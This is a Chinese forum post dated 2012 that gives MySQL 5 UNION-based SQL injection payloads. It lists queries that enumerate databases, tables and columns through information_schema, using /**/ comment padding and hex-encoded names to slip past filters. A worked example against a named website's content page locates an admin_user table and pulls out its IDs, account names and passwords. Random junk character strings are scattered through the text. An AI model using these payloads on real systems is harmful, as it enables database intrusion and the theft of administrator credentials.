查库
# j8 ]- d8 ^- n( [9 d) h1 O7 Q- v% |/ k
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
- G! J. S9 \3 ]2 `# w7 _, J/ l- Q
/ c1 ?; [" V1 H6 C查表
7 p) g" X$ R: s9 h4 `. E& C' ]+ _) w) f* Y3 B( W# {6 {( Y
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1/ A& v' Q7 M+ J9 _' f4 G2 Z
0 R% i3 Z7 F9 c5 ]$ f V9 V
查段
+ ~# F0 ~/ o0 G% l* N: `4 r) W* p- q$ M e) e
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
( n5 o! U0 z( b, ~+ Z& `$ y( g% X
; E* ?' g3 t$ y
! f0 U$ C$ B/ J. O4 z1 }( S3 c* wmysql5高级注入方法暴表
# U4 b* u8 ?7 |* {( j; z9 Z- j% ~2 t6 {
例子如下:1 W) W0 _7 m) I+ C& m
# t. p: L+ z; B1.爆表
# M3 P. d* |: j- [3 jhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)% ~% t; W6 v3 L% ]
这样爆到第4个时出现了admin_user表。- ~- r' D6 H. K. G3 w, f
6 t6 H4 M: d5 W* ~" G0 ~
2.暴字段
& s9 p& I9 L0 v" E7 C" Ohttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*% o1 ^2 S5 U3 d& f2 X2 K& M
, ~8 N# [- c$ b" X% H* G
2 `9 h/ D# O9 T( a* Y/ y3.爆密码
$ r: V4 O6 U5 l+ E% z# Rhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
& F5 m2 B5 f" i( E" R1 }9 l
1 S% L( U; R1 j6 H5 L+ B: k; ^ H* L4 d; X9 v2 ^
|
发表于 2012-9-13 16:29:37
收藏
支持
反对